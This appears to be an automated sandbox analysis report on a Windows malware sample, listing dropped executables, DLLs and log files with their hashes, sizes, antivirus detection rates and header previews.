                                                                                                                                                                                                                            SHA-512:F57DB0A9B1C9FFFC79AB601006128D0387951C4D3375CFD79CABCF33C7F50CCB90E5E86FA7D2574152F6F83C517932AF6684E643E03063BC7EC5B1591249D301
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:Bootstrap LogFile..-----------------..[25/04/2024 09:04:34]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[25/04/2024 09:04:34]: This Brand IOLODEFAULT Not Detected As Installed..[25/04/2024 09:04:34]: No Supported Products Were Detected On This System..[25/04/2024 09:05:26]: Telemetry Data Sent..
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.3.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):346
                                                                                                                                                                                                                            Entropy (8bit):5.181879981744728
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:q8jVMuMg0TCfk3VotGjZb34L8jVM0/Qilo4jVOQs0TCfk3VotGjZb34L8jVO0iQ2:ljt6TXVotgOL8jDoi/j4QHTXVotgOL82
                                                                                                                                                                                                                            MD5:EC241707B73A48CC2CF580046C57BCE0
                                                                                                                                                                                                                            SHA1:BE93B4D3A7A01A33904DF5720C846C2498C64B1C
                                                                                                                                                                                                                            SHA-256:9DF0B43C4EAE5B257A603D62C4526A05524F6D20DBBE14B658A0A10D16DE1547
                                                                                                                                                                                                                            SHA-512:AB999004D4ABC66BC7A906B194F3A52E8C8CCE760A57177A2FE641ADB702B14BA3CA88435B613A93CA6B7F19801C37AD5770A8B872E3AF3BA1848E2FA7BA0F67
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[04/25/24 09:04:08] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/25/24 09:04:09] IsValidCommunication : Result := True...[04/25/24 09:04:23] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/25/24 09:04:24] IsValidCommunication : Result := True...
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: mJVVW85CnW.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: MBSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: MBSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                                                            MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                                                                                                                                            SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                                                                                                                                            SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                                                                                                                                                            SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):410
                                                                                                                                                                                                                            Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
                                                                                                                                                                                                                            MD5:812F0A8C671812AA613FC139B69E8614
                                                                                                                                                                                                                            SHA1:B4177437C50B25B06FB885362DA36FD171A1C5A9
                                                                                                                                                                                                                            SHA-256:6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
                                                                                                                                                                                                                            SHA-512:6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):545792
                                                                                                                                                                                                                            Entropy (8bit):6.384805269039956
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
                                                                                                                                                                                                                            MD5:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                            SHA1:D5927B38A32E30AFCF5A658612A8266476FC4AD8
                                                                                                                                                                                                                            SHA-256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
                                                                                                                                                                                                                            SHA-512:355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 38%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1514213
                                                                                                                                                                                                                            Entropy (8bit):7.761450114032783
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:qoSKVXfYCLaLoFG+evn0wq+epoIpibue6yJiK4BI/9zUUQu/Mxu4UytemKDxguk9:qoSKRBaLXls0Ipibue6yJiK4BI/9zUU6
                                                                                                                                                                                                                            MD5:4752ADE0216D093D91816B8A639A6405
                                                                                                                                                                                                                            SHA1:FC6B4E6D4F1AFFF7CA233566CE19427B7B2CFB20
                                                                                                                                                                                                                            SHA-256:3D3FF011110339C54608DCD9397FEB60F862F72543BD15DE21E1B8B9BEF92588
                                                                                                                                                                                                                            SHA-512:6496DBC1EAC8A45737917E2F70B28A30CABC4EA6752660F1564CA4E19DE85E1A41702EC67D89231ADA0E28865691F4036BCB6E1D8D6992834CBEF43E52828777
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<...>...?...?...>.......+...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.......{.......\...P...h...P...l...K...Q...M...^...l...K...?...?...?...?...?...?...?...?...?...?...?...|...V...S...z...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...|...Z...v...^...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.......{...c...M...Y..z...M...H...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...I...........?...?...?...?...?...?...?...?...?...?...
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1514213
                                                                                                                                                                                                                            Entropy (8bit):7.761449383442233
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:DoSKVXfYCLaLoFG+evn0wq+epoIpibue6yJiK4BI/9zUUQu/Mxu4UytemKDxguk9:DoSKRBaLXls0Ipibue6yJiK4BI/9zUU6
                                                                                                                                                                                                                            MD5:C2B368082A22D638E2D4986A55BCBAB9
                                                                                                                                                                                                                            SHA1:059289E5CCBF1DCDA47C68CA4A8599EE5AC3935B
                                                                                                                                                                                                                            SHA-256:CB6A1407412BBAF12C3D00CFDF2E031856C48A3D5BB3D1ECC76A11E257E10DE3
